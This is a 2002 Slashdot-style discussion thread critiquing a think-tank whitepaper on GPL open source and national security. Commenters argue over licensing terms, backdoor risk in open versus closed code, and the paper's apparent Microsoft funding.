ADTI Whitepaper Released 572
"Another security concern is that the primary distribution channel for GPL open source is the Internet. As opposed to proprietary vendors, open source is freely downloaded. However, software in the public domain could contain a critical problem, a backdoor or worse, a dangerous virus."
Reverse engineering "harbors very close to IP infringement because and has staggering economic implications." [sic]
"On a lighter note, while many open source enthusiasts are proponents for copyleft, they insist on trademark protection for their ideas."
"If a software application representing 5000 hours uses GPL code that reflects only 100 hours, is the GPL fair in its argument that the entire product is GPL? This point is of considerable concern to software companies that value their secrets, design and architecture strategies. Proponents of the GPL argue that each party in the exchange is benefiting equally, but without a means to properly make this evaluation, this position at best is over-assuming."
"The federal government's information systems requirements intersect countless sensitive operations. The limitless potential for holes and back doors in an open source product would require unyielding scrutiny by staff that decided to use it. For example, if the Federal Aviation Agency were to develop an application (derived from open source) which controlled 747 flight patterns, a number of issues easily become national security questions such as: Would it be prudent for the FAA to use software that thousands of unknown programmers have intimate knowledge of for something this critical? Could the FAA take the chance that these unknown programmers have not shared the source code accidentally with the wrong parties? Would the FAA's decision to use software in the public domain invite computer 'hackers' more readily than proprietary products?"
The perfect job! (Score:4, Funny)
they get paid to troll!
Man, I gotta hook myself up with a gig like this...
Re:The perfect job! (Score:5, Funny)
Being paid to troll has been around for decades now.
Its called "marketing".
Re:The perfect job! (Score:3, Interesting)
"On a lighter note, while many proprietary software makers wish to use the 'treasure trove' of public domain, Open Source, and Free Software (GPL and similar licenses), they insist on strong copyright, patent and trademark protection for their own ideas and products -- in a manner of speaking, wanting to have their cake and eat yours too."
"If a software application representing 5000 hours uses GPL code that reflects only 100 hours, is the GPL fair in its argument that the entire product is GPL? After all, if proprietary software vendors don't like the terms of a software license, they should not reasonably be expected to abide by it. This point is of considerable concern to software companies who wish to use the work of other without compensation -- 'pirating' the free software, to use a popular industry term. Proponents of the GPL argue that each party in the exchange benefits, which is the basis for a free, capitalist society, but proprietary software vendors don't always like this arrangement. Interestingly, proprietary software vendors often include highly restrictive and draconian licenses with their products, and disallow all use of them by any other developers; this, somehow, is presented by them as the 'fair market solution' -- what ours it ours, and what's yours is ours."
I just grabbed a copy of it.... (Score:2)
Just in case... (Score:5, Informative)
Re:Just in case... (Score:2, Informative)
Re:ADTI Whitepaper Released (Score:2)
Re:ADTI Whitepaper Released (Score:3, Informative)
Re:ADTI Whitepaper Released (Score:5, Insightful)
Except that using GPL code doesn't compel you to "release" anything. It only means that if you elect to share your code with another party, you do so under the terms of the GPL.
The
The only security issue with the GPL is the security of companies who derive revenue from selling proprietary code.
Re:ADTI Whitepaper Released (Score:2)
Okay, is it just me or is the difference b/w these pretty much nonexistent? I assume there are other open-source licenses, but they'd all do the same thing anyway.
The advantage of open source is that your customers can continue to maintain and upgrade your code after you go bankrupt.
-a
---
When the man in front of you is shot, pick up his gun and start shooting.
Why is the GPL so misunderstood? (Score:5, Insightful)
Please, take a moment and read the GPL. Then come back and ask people questions about it. (I believe there was an Ask Slashdot about it awhile ago...)
Using GPL'd code does not mean you have to automatically release all of your code. First off, the GPL cannot override other more restrictive licenses. If you don't have the right to GPL the code that you've included then you can't release it, you have to remove the GPL'd code instead. Second, the GPL's release/publish conditions are only invoked if you release/publish your code. This is a very important distinction. If you develop something "in house" for your company's use, then you don't have to release the resulting code. If you don't distribute it then you don't have to publish it.
As far as "malicious code" goes, look at all of the "easter eggs" and "bugs" in current "professional" code. How much overall code review do you think goes on when an entire flight simulator gets packed into a spreadsheet application? (You may have noticed how a Service Release deactivated it.)
In the Open Source world, if you doubt some code then you can simply audit it. Good luck if you think there's some backdoor lurking in the latest MS code. (Look at MS's WMP EULA that gives them permission to force downloads on your box in the name of "DRM".)
There's a reason that people use the cover of darkness to perform questionable/malicious acts. Having the source code for full review and scrutiny is the best way to shine a bright light into all corners.
Re:ADTI Whitepaper Released (Score:2)
Well at least you admit it.
Look, the GPL does not compel you to release, share or even present your source code if you're using a GPL-coded application. It only stipulates that if you share your code (in source or compiled binary form), you must do so under the terms of the GPL.
The government could easily act as a single entity here (an umbrella over all the various agencies, e.g FAA, FBi, etc) and use all the GPL'ed software it wants and be under zero obligation to share with anyone. That is, of course, assuming the develop it in-house. If they want the participation of the worldwide OSS/Libre Software development community, it becomes a bit more tricky. Hoever, they could always have the spooks scramble a few bits and keep the kinks to themselves.
frame of reference? (Score:5, Insightful)
A valid concern.
But is it more or less risky in comparison to using closed source software?
Sad (Score:5, Insightful)
I can't be the only one saddened to see the name of Alexis de Toqueville besmirched by being associated with a think tank for hire.
His insights into America of the early 19th century were profound.
Meanwhile, the points of this paper, besides being wide of the mark in assessing the truth, are not even particularly original - other fear mongers have trotted out the same vague bogeymen prior to the publication of this report. And those objections to open source have no more basis in fact now than they did when they were originally brought out.
excellent observation. (Score:4, Insightful)
The page was generated with Adobe Go Live, and the mission statement is an image or something else difficult to copy, so I had to type it by hand for your enjoyment.
Since 1988, the Alexis de Toqueville Institution has studied the spread and perfection of democracy around the world. I'm not impressed
In this we follow the principles of Toqueville himself...
At the root, perhaps, is a populist belief in the basic goodness, perfectibility, and nobility of mankind and of the human community....
Our principles guide the selection of which issues are critical to the advancement of freedom - but we don't rush to judgment about which means will be most effective in producing it.
I'm afraid that they have rushed to judgment and condemned one of the most important documents protecting freedom of speech today. The GPL is the only document that insures that you will have control of your computer and therefore your publications will not be censored at the source. It does this by insuring that the possesor of GPL code will always have the ability to use, understand, modify and distribute that code as they see fit without reducing the rights of other users to do the same. Code that does not insure this right has all of the security flaws and fears raised in Ken Browns paper as the owner does not know what the machine is doing or have the ability to change it. ADTI completely misses the point and condemn the GPL because they fear it can not be comercialized in the conventional fashion and many other incorrect and confused reasons. This is a shame because there is nothing more important for "democracy" and freedom than the free exchange of information the GPL ultimately protects.
The greatest contradiction is seems to be their main reason for rejecting the GPL as a license worth using: that volunteer efforts can not match commercial ones, and that the GPL community of volunteers is a myth. Well, I'm sitting here with my mythical OS, typing into a mythical text editor, for a mythical browser. All are far better than commercial alternatives. All were developed and rely on tools created by volunteers and others who really do believe in the goodness and freedoms of their users. No one who has respect for his neighbor would ever say that people could not co-operate without a profit motive, but this is what Ken concludes,
What utter hogwash. The GPL enables all to participate in the development of new technology and removes many artificial barriers. The fruit of all the mentioned government programs has been brought to me in a form I can manipulate by Debian. The number of sound scientific programs I now have access to, through GNU compilers, is uncountable. There are few academic publishers who would have it any other way, they exist to teach and promote their various specialties. To top it off, large companies will continue to pour money into the exploitation of these technologies because it is in their best financial interest. So much the better if that means their derivative works will be available to me as well. How can anyone intellectually honest say otherwise, especially while espousing freedom and the goodness of man?
Oh, enough. The more I read of this MicroSoft parrot's garbage, the angrier I get. Especially unkind and untrue is the assertion that RMS is a "fallen hero" viewed as radical. I respect that man more every day. Ken Brown, you are a 1/4 watt bulb.
Re:Sadder (Score:4, Interesting)
Unfortunately, his countrymen didn't learn very well from his writings, as France has been through at least 7 forms of government since their revolution.
For more info, see his book: Democracy in America [virginia.edu]
Sounds good to the ignorant (Score:2, Insightful)
Where are the "think tanks" that actually have people who can think critically?
Re: Sounds good to the ignorant (Score:5, Insightful)
> Where are the "think tanks" that actually have people who can think critically?
Think tanks only need to think critically enough to fool their intended audience.
And this is for consumption by businessmen, legislators, and bureaucrats, so...
Re:Sounds good to the ignorant (Score:3, Funny)
Beware of the words "think tank." The closest you are going to get to unbiased thinking is from academia, not think tanks.
Re:Sounds good to the ignorant (Score:2)
HAHAHAHAHAHA...Cough...gag...splutter.
That's the funniest thing I've read all day! You are either an exceptional comedian, or have never met an academic.
Re:Sounds good to the ignorant (Score:2, Insightful)
The fact of the matter is that objective think tanks just don't exist because there aren't any companies out there that want to fund truly objective research.
They want the research to show what they want it to show.
Obvious Answer ... (Score:5, Insightful)
If you don't want your app to be GPL, and you've already spent 5000 hours coding it, might as well spend another 100 writing that piece instead of cutting and pasting.
Re:Obvious Answer ... (Score:5, Funny)
I mean, it's not like we're stealing Norton Doublespace or anything....
Re:Obvious Answer ... (Score:3, Insightful)
BTW 100 hours is a ridiculously small number - certainly below the threshold where even if you're considering licensing a commercial package it's probably not worth the lawyer time to write a contract
Re:Obvious Answer ... (Score:4, Insightful)
If I have 5000 hours of video in my library, but only 100 hours of that is copyrighted by Hollywood, is the MPAA being fair in their argument that I'm stealing from them?
Re:Obvious Answer ... (Score:3, Interesting)
what if you used some Ms code? (Score:2, Insightful)
What would that do your 5000 hour product?
The GPL is less disruptive than borrowing other code that comes with limitations.
Besides, if you use code from other sources you certainly should know the impact of doing so. The GPL is not different in that regard.
I guess Microsoft thinks that proprietary code should be outlawed because if it should mistakenly get its way into an application, you could be sued, right?
Re:Obvious Answer ... (Score:3, Insightful)
"If a software application representing 5000 hours uses GPL code that reflects only 100 hours, is the GPL fair in its argument that the entire product is GPL? After all, if proprietary software vendors don't like the terms of a software license, they should not reasonably be expected to abide by it. This point is of considerable concern to software companies who wish to use the work of other without compensation -- 'pirating' the free software, to use a popular industry term. Proponents of the GPL argue that each party in the exchange benefits, which is the basis for a free, capitalist society, but proprietary software vendors don't always like this arrangement. Interestingly, proprietary software vendors often include highly restrictive and draconian licenses with their products, and disallow all use of them by any other developers; this, somehow, is presented by them as the 'fair market solution' -- what's ours is ours, and what's yours is ours."
Re:Obvious Answer ... (Score:4, Insightful)
but you knew it was GPL'd up front when you decided to use it right? if so then you budgeted for it - either to replace it with your own or to negotiate a non-GPL license from the author. If you didn't do either then you're lying to yourself (or your boss) and you are going to screw yourself.
In the real world there are good reasons to use GPL and LGPL - it depends on what your goals are - GPL tends to encourage other people to add to your code and give it back to the greater community (Linux, KDE, Gnome etc)- long term you get back your stuff in a better state (and other stuff from other people) and you win - you help create a community of people who want to make stuff and share it with you - humans have been coming together in communities for all of recorded history because it's in our individual interests to live and work together.
On the other hand LGPL addresses a wider audience - you might have different reasons for using it - you like the idea of more people using your stuff, you want to be able to say "my code's running in that game/app/whatever", lots of people lent on you to LGPL it and you caved, you feel that with a wider audience more people will use it and you feel that forcing people to publish their changes to it will cause it to become better faster.
My point is of course that neither of these are necessarily "good" or "bad" but that they are vehicles of their authors and because those authors put their time and effort into the project thay get to choose the goals (and as a result the license) for their code - as a user you have the choice - either agree to the license or do it yourself
No wonder they took it down... (Score:5, Insightful)
"harbors very close to IP infringement"
"are proponents for copyleft"
"code that reflects only 100 hours"
"knowledge of for something this critical"
Blech...
Re:No wonder they took it down... (Score:4, Insightful)
This is (somewhat) more important than it looks, folks. When the ADTI folks accuse OSS projects of being less than professional, we can simply point to the origional document and say that this "Think Tank" can't even correctly write American Engish.
Rushing the document out the door without proper proof reading shows un-professionalism from ADTI in completeing thier task, a clearly worded and concise critique of the GPL. Pointing out this fact may damage thier credibility in a way that regular folks will understand. This should then allow the larger arguments of an opinion bought and paid for by the BSA in the door, too. We win.
Think tank indeed. Wonder if the CSS camp got it's money's worth?
Soko
Re:No wonder they took it down... (Score:2)
I had exactly the same thought, after reading the very first paragraph. Issues of proofreading aside (we all occasionally write "of for," or something similar, especially when revising a document and changing the format of sentences), the report just isn't well-written. The concepts are vague, the language is unclear, and the overall structure seems very haphazard. I would be embarrassed to release it, especially given the amount of hype it has received and the supposed high-profile of the think tank.
-schussat
can't resist (Score:4, Funny)
Following the old Usenet tradition that every spelling and grammar flame must contain at least one spelling or grammar error, you meant "its." There's no apostrophe. See Bob The Angry Flower [angryflower.com] for details.
Well, they may have a point somewhere in there... (Score:4, Interesting)
It is true that open source applications, being openly available on the internet and distributed in the same manner, are susceptible to backdooring and trojaning. Just look at IRSSI [irssi.org] or FragRoute [securityfocus.com].
This risk factor is somewhat mitigated in commercial software, where the distribution is typically through CDs and other trusted media. Of course, someone can still somehow compromise a software developer's network, but it isn't exactly hanging out a sign saying "I'm the source code, hack me!" like the open source projects.
Just imagine, for a minute, how devastating it would be if Sourceforge was hacked and malicious code was inserted into a ton of the projects without anyone noticing for long enough that it could cause real damage? The danger is clear.
Not convinced (Score:4, Insightful)
If you subscribe to Redhat Network, all the
In short - this is not an issue.
Simon
Re:Not convinced (Score:3, Interesting)
I'm a firm believer in the GPL and Linux. That having been said, consider the following:
Eve wants to create a back door that lets her root by sending a particular, carefully-constructed packet to Apache. She discovers a way to do this by hiding it in a very subtle bug that she introduces to some component of the Apache system. After months of research, she finds a way to introduce the bug, by incorporating it in a modification that's too good for the Apache project to pass up. Eve's code becomes part of the next release, which is signed by the Apache project with a legitimate signature. Thousands of users worldwide download the buggy Apache RPM, verify the signature, install it on their machines, and restart httpd. Eve and her friends, perhaps months later, then use the compromised httpd to infiltrate a bunch of systems. The bug is finally found after hundreds of rooted boxes, and a patch released to fix the bug (and therefore the hole); but meanwhile, the damage has been done.
I'll grant that this is an awful lot of work to go through to get root; this scenario is strictly meant to be illustrative. My question is, what practices can we adopt, as a community, to prevent this from occuring in practice?
(We might also keep in mind that there are parties out there that are more interested in causing psychological damage than actual damage, and who may view this kind of operation as worthwhile if they can just get consumers into a panic.)
OK, done talking, now I listen :)
Re:Well, they may have a point somewhere in there. (Score:2, Insightful)
While what you say is technicaly true, at least with open source, hackers(as in the jargon file definition) have a chance to go over the source and fix any back doors implemented. If you only receive binary files, who's to say that the company themselves hasn't inserted a backdoor or left a myriad of security holes unfixed. The above quote is a bad way of looking at it, because the exact same arguement can be applied to closed source.
Re:Well, they may have a point somewhere in there. (Score:2)
> This risk factor is somewhat mitigated in commercial software, where the distribution is typically through CDs and other trusted media. Of course, someone can still somehow compromise a software developer's network, but it isn't exactly hanging out a sign saying "I'm the source code, hack me!" like the open source projects.
And then there's the pirates' CDs that consumers buy thinking they are getting the real thing. What's to stop a pirate from turning evil (heh) and burning a trojanized bootleg rather than a straight copy?
Who's to say they haven't already done that...?
> Just imagine, for a minute, how devastating it would be if Sourceforge was hacked and malicious code was inserted into a ton of the projects without anyone noticing for long enough that it could cause real damage? The danger is clear.
There was a notorious case a couple of years ago where someone put a hax0red version of a popular OSS product on a popular FTP site. It was caught in about 4 hours, and the site admins used their FTP logs to identify and notify everyone who had downloaded it during that period.
Re:Well, they may have a point somewhere in there. (Score:2)
It doesn't even have to be malicious. Awhile ago, the original author of cfingerd was heavily criticized for making a finger daemon that insisted on running as root. His response to such criticism was to simply abandon the project.
When holes were inevitably found in cfingerd, there was no one maintaining the project and thus no easy way to get it fixed short of someone actually adopting the project. In the absence of a caretaker, the last buggy version continued to live on in open source mirrors for quite a while.
From what I understand, the project was eventually continued and cleaned up, but the interim had a dead, unsafe piece of code sitting right next to its safer/more maintained breathren. At least with commercial code, the EOL'd stuff is usually explicitly EOL'd. On the other hand, in a non-source provided context, you're still beholden to the vendor for patches. But I believe in this case, the group is advocating commercial code that comes with the source.
Re:Well, they may have a point somewhere in there. (Score:4, Insightful)
No, they ad advocating that open source is good, because commercial companies can use it to cut costs (and profit on the backs of others' work), but that those companies should not have to repay the community for reasons of security.
It really should read 'borrowable open-source good, except when the source code is mine
We all know the usual
I've been watching the commercial world come to the realization that open-source isn't what they should be scared of (MS has borrowed BSD'd code many a time)
It's the usual power mongering, and desire to not be held accountable for any of it.
Re:Well, they may have a point somewhere in there. (Score:2, Informative)
In other words if any government group were to use an open source product or start one of their own they are still required to keep their copy of the source tree for the code under rigid, monitored control to ensure what happened to irssi and FragRoute could not happen to their project.
I'm not saying that CVS will be the total solution to this problem, but it's nice to see that they do have measures built-in to mitigate the risks.
Good ol' security through obscurity (Score:5, Insightful)
Yeah, there's nothing like the good ol' security through obscurity. Thank God no one knows how does the software controling 747 flight works, so now I can fly safely.
Re:Good ol' security through obscurity (Score:4, Insightful)
Re:So open sourceing it..... (Score:2)
Even this may not be necesary. The GPL's definition of distribution could be interpreted in such a way that, since the software is never leaving the FAA, the FAA isn't "distributing" it and would thus not be obligated to release its modifications.
If the FAA decided to sell this or give it away to private entities or foreign governments, it would only then be obligated to release their source code.
This key point seems to be missed pretty frequently by critics of the GPL. If an entity maintains ownership and control of GPL'd software and does not release it, they are not bound to tell anyone about the modifications they've performed. Their code can be just as closed and proprietary as they like.
What an interesting ploy.. they are full of FUD (Score:5, Insightful)
They also ignore the aspect of the GPL that says you can keep your secret changes if you don't distribute the software outside of your organization. Where is the security leak now?
The difference between "GNU FREE" and "BSD FREE" is that the people in BSD are willing to sacrifice themselves (no reward), whereas the GNU people are willing to take up arms (we reward you, but you must reward us in return, if you use our stuff).
The comminuty is more alike that it is different. Don't let these types of papers and publicity screw that up.
Backdoors in OSS? (Score:5, Interesting)
The Parable of Free Air (Score:5, Interesting)
One day, a group of daring young renegades discovered that there were other ways to get air, just by moving some rocks that blocked openings to the outside. And they offered their air free. At first people were hesitant to use Free Air, thinking something must be wrong with it since it was free. Initially Microshaft ignored the renegades, dismissing them as a fringe movement and minor nuisance. But eventually Microshaft saw them as a threat. They started a major marketing campaign to convince people that the Free Air was bad for their health. But people found that they actually felt better and healthier breathing the free, fresh air. Microshaft added more and more features to their air, perfuming it and coloring it with smoke to give it "added value". Many people started to dislike Microshaft's heavy, bloated air that was hard to breath and began flocking in droves to the sources of Free Air.
About this time, after some years of hard volunteer work, Open Air developers finally increased the size of a Free Air portal so that a person could actually squeeze through to the outside. The first brave individuals who ventured through it discovered that not only was there an unlimited supply of air in the outside world, there was no way you could harness and control its supply.
Alarmed, Microshaft sought to have the government declare Free Air illegal since it threatened their business model, which they had developed and rightfully earned through many years of hard work. They called the use of Free Air "theft" and claimed that the "viral" nature of the Public Breathing License advocated by many Open Air rebels would threaten the livelihood of Microshaft's suppliers and distributors. Indeed, the whole economy of the cave would collapse, they said. Laws were quickly passed and the portals of Free Air were sealed off.
A charitable organization called the Business Air Alliance was formed to help protect businesses against the threat of Free Air portals. By proving that it was theoretically possible to fund terrorist organizations with the money saved by breathing Free Air, the BAA successfully lobbied to strengthen the laws so that any attempt to make an opening to the outside became punishable by death. Possession of shovels and picks became a criminal offense, and the BAA performed random audits to help citizens comply with the law. For their protection, everyone was required to wear an Air Rights Management security device, which would send an alarm to the authorities if it didn't detect a secret mix of fumes found only in Microshaft air.
As time passed, Microshaft and the government became indistinguishable. To prevent future uprisings, a new feature was added to the air to keep the people sedated happily ever after.
Some thoughts on the paper.. (Score:5, Interesting)
by its programmer, hiding the underlying code from its user. Software can only be modified in
its "unlocked" state when source code is viewable.
This is the assumption that is the flaw in the entire argument. While having the source code makes it easier in some ways to find exploits, it of course makes it easier to find them earlier and fix them. Whereas in a closed source implementation it's more likely that there are unidentified flaws in the software because there are fewer eyes willing to parse through assembly listings. But if a 'terrorist' is dedicated enough to do that, they're more likely to find such flaws.
The GPL is one of the most uniquely restrictive product
agreements in the technology industry.
Interesting. I never thought of it that way when I can use a program for whatever purpose I want, make modifications to that program, and distribute either the original or my modified version of that program. Maybe I'm just weird like that...
By the early 90's, open source enthusiasts began to view Stallman as an extremist and fanatic. The rise in the popularity of Linus Torvalds and the Linux
open source operating system began to create new supporters. Ironically, Linux supporters
became the biggest proponents of the GPL. Although Stallman is a fallen hero in the open
source world, most open source products today are distributed under the GPL license.
While I'm not the biggest RMS fan, uhh, I can't just let that statement go. For once, I agree that not calling it GNU/Linux really misleads readers in this case. Without the GNU tools, Linux wouldn't have a leg to stand on. It's tough to dismiss RMS's importance here (but the author manages somehow..)
The article goes on (and on and on), but I think it's fair to say that this is a fairly one-sided view of the GPL that looks like it was written by MS and Kenneth Brown just signed his name to it. Nothing here, just the usual FUD.
Re:Some thoughts on the paper.. (Score:2)
Uniquely Restrictive. Break it down. It is restrictive in that it imposes restrictions; It is uniquely restrictive because (gasp) the restrictions it imposes are unique. Just because it's less restrictive than other licenses does not mean that it's restrictive.
The most important restriction (as noted here, there, elsewhere, and everywhere) is that if you use some GPL code, the whole package has to be GPL. If your app requires a GPL package, then your package has to be GPL. That means that creating a library using GPL code doesn't let you get around the GPL issue, because if that library contains GPL code, it must be GPL'd, and if your app requires that library, it must be GPL'd. LGPL does not have this restriction, as I understand it, but that still doesn't help when something is GPL and not LGPL. So I'm sure you can see why the license would be unattractive to some people. It's not worth it in its own sense to use a GPL license unless there is already a package that does 99% of what you want. If you are trying to further the GPL, then it makes sense to release everything under the GPL, but this is not the government's goal.
I don't think he's a fallen hero either; There are plenty of RMS-following zealots. That's not likely to ever change. While in the end I agree with him to a certain degree - people shouldn't get paid to write software - I also think that people shouldn't get paid to do anything, and we should have a society without money. Since that's not likely to happen any time soon, RMS needs to just get the hell over it. In a society with money, we need to get PAID.
As for the GNU tools; It is or should be possible to build linux with non-gnu tools. If you started with a complete BSD system with someone else's compiler and compiler tools it should be possible to come up with a version of the linux kernel which is completely portable. (I don't know if linux builds with any other toolchains right now... does it? Like Sun's SPRO compiler and related tools, or watcom?) Anyway, it's called linux. Maybe every distribution of linux extant today should be called (packager) GNU/Linux (Redhat GNU/Linux, for example.) But Linux is Linux, we all know what it is, and the average man on the street couldn't give a fuck about GNU, he just wants to know that he can load the OS and get work done, whether that's windows or linux, and tacking GNU/ onto the front of a word isn't going to change that. Besides which, it's cumbersome; Even if the entire OSS world decided to call it GNU/Linux, people would still call it Linux. So just build a bridge, and get over it.
As for your one-sided view issue; If we're talking about national security, it's going to be written from a paranoid mindset, and rightfully so. Better to be paranoid and duplicated work, with code not released to the public, than to fuck up and install a fat backdoor that lets skript kiddies fuck around with our nation's communications, for example. You know, like the private telecom system...
Re:Some thoughts on the paper.. (Score:4, Insightful)
Except that it's "MOST uniquely restrictive." It's already been established (in other comments) that this Think Tank consists of so many high-minded, conceptual thinkers that there was no room for a grammarian. Even still, I have to give them the benefit of the doubt and assume they meant "most ... restrictive," and not the completely daft, "most uniquely."
First, I've never heard of anyone absolutely needing to use GPL code in their package. You can choose to do so or not. Of greater import, however, is that despite your keen insight that some people just won't understand/like the viral nature of the GPL, this whitepaper isn't purporting to be opinion, but a factual analysis of the risk inherent in the GPL. Additionally, you fail to point out that even if the resulting package is GPL, that doesn't oblige you to distribute it, and thus, you don't have to release the source code.
Okay, fine, I'll (temporarily) accept that paranoia is a good thing, here. But this is just one paranoid view. Another paranoid view is that with the number of foreigners employed in the tech sector, terrorists could already have been introducing backdoors into closed source products for years, now. Another paranoid view is that computers are inherently dangerous, electricity is the spawn of Satan, and we should all call each other Jebidiah, raise barns, churn butter, and sell cocaine. There's lots of paranoid views. Just because you think paranoia is acceptable in this instance doesn't do anything to validate the views expressed in the whitepaper. A lot of people, these days, have eschewed critical thinking for mindless support for whatever's been pushed to "stop the terrorists." It's both wrong and dangerous, even in paranoid times.
Of course, paranoia isn't the right framing for anyone, anyway. Rational risk analysis is, and always has been, better. There's a massive divide between planning for the Worst Case Scenario and outright paranoia. We'd be wiser to not ignore it.
Microsoft advocacy (Score:5, Insightful)
Many of the headlines are quite revealing about their intentions. Many are about the importance of MCSE:
- Inc. 500 Shops Value Certification Most (MCSE vs college degrees)
- Familiarity Breeds Respect
- Technology Trends: Program Provides Information For New Age
- The Impact of Technology Training Programs Case Study: MCSE Training
And then there are numerous anti-trust criticism articles:"Recruiters tend to hire MCSEs just as often, if not more so, than those with a four-year college degree."
"Eighty-seven percent of human resource managers surveyed believed that MCSE's are equally or more successful than college students."
- Break up Microsoft? Rest of world pooh-poohs the notion
- Press Release: Japan, Switzerland, and the EU do NOT insist on breakup of Microsoft, unlike the U.S.
- Fine Microsoft, use funds for new competition (anti-breakup)
- Fine Microsoft and use funds to catalize new competition (anti-breakup)
- Break-up Remedy for Microsoft Not Supported by Key Democrats
- Technology and The Congressional Black Caucus (Microsoft anti-trust)
- Breaking Windows Over Antitrust Dogma
- Pause the Microsoft Case and Examine U.S. Anti-trust Policy
- Punishing Winners Hurts the Marketplace
- Suit Threatens U.S. Computer Dominance
- Taking a Byte Out of Microsoft
Etc. Also lots of articles about the precious intellectual property rights, although not specifically in relation to Microsoft.Make your own conclusions freely.
Difference for Security between GPL and other OS? (Score:2)
I could, as a proprietary vendor, take a BSD style license product, and close it up and sell it to the government. At that point though, until I start adding modifications, there is no reduction in the risk of some outside source finding a bug in the code. Once I do make modifications, there's the risk of complacency. Perhaps the government doesn't realize that the code I sold them is based on a buggy open source implementation and is thus vulnerable to a potential security breach.
This just wreaks of having been written by Microsoft's PR department.
Oh, and one more comment. The notion that the GPL is somehow one of the most restricitve licenses is complete hogwash. Does microsoft let you incorporate the windows source code into your product under ANY circumstances? Hell they don't even let you see the source code in the first place (and thank god since it's apparently riddled with big security holes). So how is that MORE restrictive?
MMMMMM a big steaming pile of FUD!
Ah, but they misread the GPL (Score:2)
As I understand it, if the FBI got a copy of Linux, they could modify the source code and distribute as they wanted to within the FBI and never be compelled to give that source code to anybody else. It's only if the FBI started taking that code and giving it out to other organiaztions that it might be at issue.
My word! Get a better hysterical example! (Score:5, Insightful)
FAA controlling the flight patterns of any aircraft is absolute nonsense! First, every pilot in the system would block it before it ever got past the talking stage, second it is just ignorant.
Maybe software to control the traffic flow? Sorry, that deflates this FUD too, since it would not apply to just one airframe and the author assumes that the people operating the aircraft are just going to let that happen too.
Maybe if he said some more nonsense about FAA requiring all 747s to have this software? Nope, that is the NTSB and the manufacturers, the latter would be marching on the Congress like you never seen before!
Humm, here is a more believeable thing to scare people with "what if all automated traffic light systems had to run Open Source, could you imagine the national security issue of flashing red lights all over the heartland"?
Re:My word! Get a better hysterical example! (Score:2)
This is a valid concern about using OSS for "sensitive" applications. Yes, in theory, more eyes means more bugs found. But most "sensitive" applications are not the type that lots of people would be interested in running, so most people would not find the bugs. But the source always is there for black hats to look at, and if they find a bug before anyone else, they can exploit it. You can pooh-pooh the idea all you want, but the added safety that obscurity gives you must be weighed against the added benefit OSS would give you. Depending on the system, obscurity may win.
Re:My word! Get a better hysterical example! (Score:2)
You are correct. The source code for these types of sensitive niche programs probably should be under lock and key, as the only people interested in taking a look at the source are those people who are looking for holes that they can exploit. However, there is nothing in the GPL that requires that you put your source code up on an FTP server. You are just required to turn over source code to software to the people that received binaries from you. If you only distribute binaries to one organization (like the DOD), then you only have to release the source code to one organization.
It is also probably a good idea to build your system on Free Software components that do get a lot of use. Borland's Interbase had a secret backdoor password until it was released as a Free Software project just recently. If you based your top secret application on Interbase you could very easily have introduced a back door via the commercial software you used as the back end. In other words, for those parts of your project where you are utilizing commodity software (a database, an office suite, a web browser, etc.) you should be using something that comes with source code.
A study supporting Open Source in the Military (Score:5, Informative)
Here [mitre.org]
is anyone really surprised? (Score:4, Interesting)
MS also says GPL-licensed open code is bad. Since MS can't use it without contributing back, it can only be used by MS's free-software competitors, thus MS strongly dislikes this kind of "free".
Now back to this study. Can anyone find the basic message surprising? "BSD code is benign, GPL is threatening". Microsoft-funded study, Microsoft-approved results.
As a side note, if MS didn't make this distinction and got everyone upset about using *any* free/open code, everyone would *also* have to stop using MS software. Remember, significant portions of their OS are built upon BSD-licensed code.
Trademarks (Score:4, Insightful)
I have a hard time taking anyone seriously who could write that.
Trademarks protect product labeling. Patents protect ideas.
Unlike patents and copyrights, trademarks are there to protect consumers. If I go to the store and want to buy Kraft mac and cheese, I don't want to have someone labeling some other brand as Kraft. If it says RedHat, it should be from RedHat.
The idea behind open source and trademarks are to help the end user. I don't see how they are incompatable.
Single minded logic IMO (Score:2)
And how is this more dangerous than a propietary vendor discovering a flaw in there product, keeping quite and not fixing it because it costs too much money?
Addendum to your sig (Score:2)
Trademark != Copyleft/right (Score:2, Interesting)
I'm missing the joke, here. Copyright and Copyleft rights aren't the same thing as trademarks at all, and it's perfectly acceptable to enforce your rights under one but not the other. Or neither, or both, as is your want.
Whatever irony the author tried to find in this alleged stance by "many open source enthusiasts" is lost on me.
These idiots aren't from the FAA (Score:4, Informative)
Which is worse? (Score:2)
If the government really has a problem with open source, they can go ahead and contract to reimplement things from scratch. But for non-classified applications (such as serving documents available under the Freedom of Information Act), I see nothing wrong with open source solutions, especially if it can save the taxpayer some money! www.doe.gov, incidentally, is running Apache.
Re:Which is worse? (Score:2, Interesting)
Funnily enough, so does ADTI. HTTP/1.0 200 OK Date: Mon, 10 Jun 2002 19:41:00 GMT Server: Rapidsite/Apa/1.3.20 (Unix) FrontPage/4.0.4.3 mod_ssl/2.8.4 OpenSSL/0.9.6 Last-Modified: Mon, 10 Jun 2002 06:09:04 GMT ETag: "9020935-1af5-3d044280" Accept-Ranges: bytes Content-Length: 6901 Connection: close Content-Type: text/html
Pinkerton Comments on White Paper (Score:2, Funny)
If the federal government has done nothing wrong then I'm sure it has nothing to hide.
Vintage 1999 FUD (Score:5, Interesting)
Of course any normal person would be utterly humiliated to have their name associated with this piece of nonsense. Perhaps that's why it has been pulled? I'd be interested if Microsoft really did pay for it. If so, I think they should feel a little cheated. The standard of FUD required in 2002 is far higher than this. Even the mainstream press are going to tear this crap to pieces.
Backdoors and viruses (Score:5, Interesting)
I love the quote on backdoors and viruses. Windows systems don't have their source code publically available, and yet that doesn't seem to stop the creation of backdoor programs and viruses.
I like how they insinuate that people would just download some code from the Internet, and then immediately put that into a production air traffic control system. Talk about a straw man argument.
Someone needs to explain to this think-tank (or senseless-opinion-tank) that people can do these things called code reviews. Ya see, if I download a new version of this mail client (for example), I can look at the differences between the current source and the last version I checked. Not only could I spot back doors, but I'd likely find some bugs too.
These guys that develop safety-critical systems (like air traffic control) are real sticklers for inspections, documentation, etc. I bet most of them would be glad for more independant reviews of the code they depend on, rather than just hoping Windows doesn't have bugs in it.
As for me, my requirements aren't as critical. When I downloaded OpenOffice from some mirror in Timbuktoo, all I did was check the MD5 sum. The five seconds that took assured me that at least no third-party inserted viruses or back doors in the program.
Re:Backdoors and viruses (Score:2)
Another mirror (Score:2)
This paper is not really about security. (Score:4, Interesting)
Ironic, huh? MS has the power and might to take and use, and they dont perceive having to apply the same standards as their code-base contributors (ie, the borrowed code) to their own product. It's flat out hypocracy to anyone with half a clue
Fuck 'em and their shareholders.
I assume by decrying the GPL for security, their lame argument is
